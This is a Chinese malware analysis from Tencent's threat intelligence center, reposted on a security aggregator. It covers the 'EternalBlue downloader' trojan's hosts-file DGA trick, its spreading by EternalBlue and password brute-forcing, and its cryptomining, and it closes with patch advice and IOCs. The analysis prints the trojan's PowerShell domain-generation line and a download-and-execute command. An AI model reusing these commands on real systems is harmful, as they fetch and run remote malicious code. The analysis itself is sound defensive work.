Sec Hotspot 首页  排行榜  收藏本站  技术博客  RSS
统计信息
已收录文章数量:13827 篇
已收录公众号数量:89 个
本站文章为爬虫采集,如有侵权请告知
已收录微信公众号
网信中国 区块链大本营 白说区块链 区块链投资家 区块链官微 区块链铅笔Blockchain HACK学习呀 二道情报贩子 合天智汇 小白帽学习之路 小米安全中心 弥天安全实验室 SAINTSEC SecPulse安全脉搏 TideSec安全团队 360安全卫士 游侠安全网 计算机与网络安全 安全祖师爷 安全学习那些事 腾讯安全联合实验室 黑客技术与网络安全 安全圈 腾讯御见威胁情报中心 Python开发者 Python之禅 编程派 Python那些事 Python程序员 安全威胁情报 吾爱破解论坛 行长叠报 安在 i春秋 嘶吼专业版 E安全 MottoIN 网信防务 网安杂谈 数说安全 互联网安全内参 漏洞战争 安全分析与研究 邑安全 ChaMd5安全团队 天融信阿尔法实验室 安全牛 SecWiki 安全学术圈 信安之路 漏洞感知 浅黑科技 Secquan圈子社区 奇安信集团 奇安信 CERT 国舜股份 雷神众测 盘古实验室 美团安全应急响应中心 瓜子安全应急响应中心 顺丰安全应急响应中心 蚂蚁金服安全响应中心 携程安全应急响应中心 滴滴安全应急响应中心 字节跳动安全中心 百度安全应急响应中心 腾讯安全应急响应中心 网易安全应急响应中心 OPPO安全应急响应中心 京东安全应急响应中心 Bypass CNNVD安全动态 安恒应急响应中心 天融信每日安全简报 奇安信威胁情报中心 看雪学院 黑白之道 水滴安全实验室 安全客 木星安全实验室 云鼎实验室 绿盟科技安全预警 白帽汇 深信服千里目安全实验室 腾讯玄武实验室 长亭安全课堂 FreeBuf 绿盟科技 nmask
“永恒之蓝下载器”木马篡改hosts指向随机域名,再用多个漏洞攻击...
本文来自公众号:腾讯御见威胁情报中心   2020.02.12 18:45:47



长按二维码关注

御见威胁情报中心


一、背景

近期腾讯安全御见威胁情报中心检测到“永恒之蓝下载器木马”使用DGA(随机生成)域名进行攻击。黑客入侵系统后,通过安装计划任务修改hosts文件,将生成的DGA(随机生成)域名映射到其控制的服务器IP地址,随后利用该域名进行恶意代码下载和执行。病毒的这一行为将会对仅根据恶意域名进行检测的网络防御系统造成新的威胁。

二、篡改HOSTS指向随机域名

域名生成算法为-join([char[]](Get-Random -Count (6+(Get-Random)%6)(65..90+97..122))), ASCII编码65到90是大写字符A到Z,97到122是小写字母a到z。Count为取的字符个数,Conut值由6+(0~5)(随机数除以6取余),也就是取6~11个随机大小写字母组合+.com作为DGA(随机生成)域名。


生成的DGA域名示例如下:


然后依次查询病毒此前注册的域名t.awcna.com,t.tr2q.com,t.amxny.com所解析到的IP地址,并通过修改本地hosts文件将生成的DGA域名映射到这些IP地址,并将该行为安装为计划任务Rtsa1。木马访问DGA域名时通过访问本地hosts文件获取IP地址,无需进行DNS解析,也就是说攻击者不需要进行域名注册。


最后,使用该DGA域名下载后续阶段的Powershell恶意代码执行,并将该行为安装为计划任务Rsta2,实现自动运行。
iex(new-object net.webclient).downloadstring(http://[DGA]/ipco.jsp?0.3)

三、利用多个漏洞攻击内网挖矿

分析发现,当前版本的“永恒之蓝下载器”木马存在以下漏洞攻击行为:


1.利用“永恒之蓝”漏洞攻击



2.针对IPC$弱口令进行爆破攻击



3.针对MSSQL弱口令进行爆破攻击


4.针对RDP弱口令进行爆破攻击


5.针对RDP漏洞CVE-2019-0708进行检测和上报


6.将矿机程序注入Powershell进程挖矿


四、安全建议

1.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP账号密码,切勿使用弱口令;

2.根据微软公告及时修复以下Windows系统高危漏洞;


MS17-010永恒之蓝漏洞
XP、WindowsServer2003、win8等系统访问:
http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问: https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

RDP服务漏洞 CVE-2019-0708
Windows XP、Windows 2003:
https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

也可使用腾讯御点或腾讯电脑管家进行漏洞扫描和修复。
https://s.tencent.com/product/yd/index.html


3.企业用户可部署腾讯御界高级威胁检测系统,发现、追踪黑客攻击线索。御界高级威胁检测系统是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。( https://s.tencent.com/product/gjwxjc/index.html


IOCs
MD5
f19d9a77c3f6f07e43f5822f9a796104
8516c4592d8de8b25df3a5e9aeff12e0

URL
t.awcna.com
t.tr2q.com
t.amxny.com

IP
27.102.114.207


腾讯云、腾讯安全招募安全运维专家、入侵分析师等多个岗位(点击查看详情)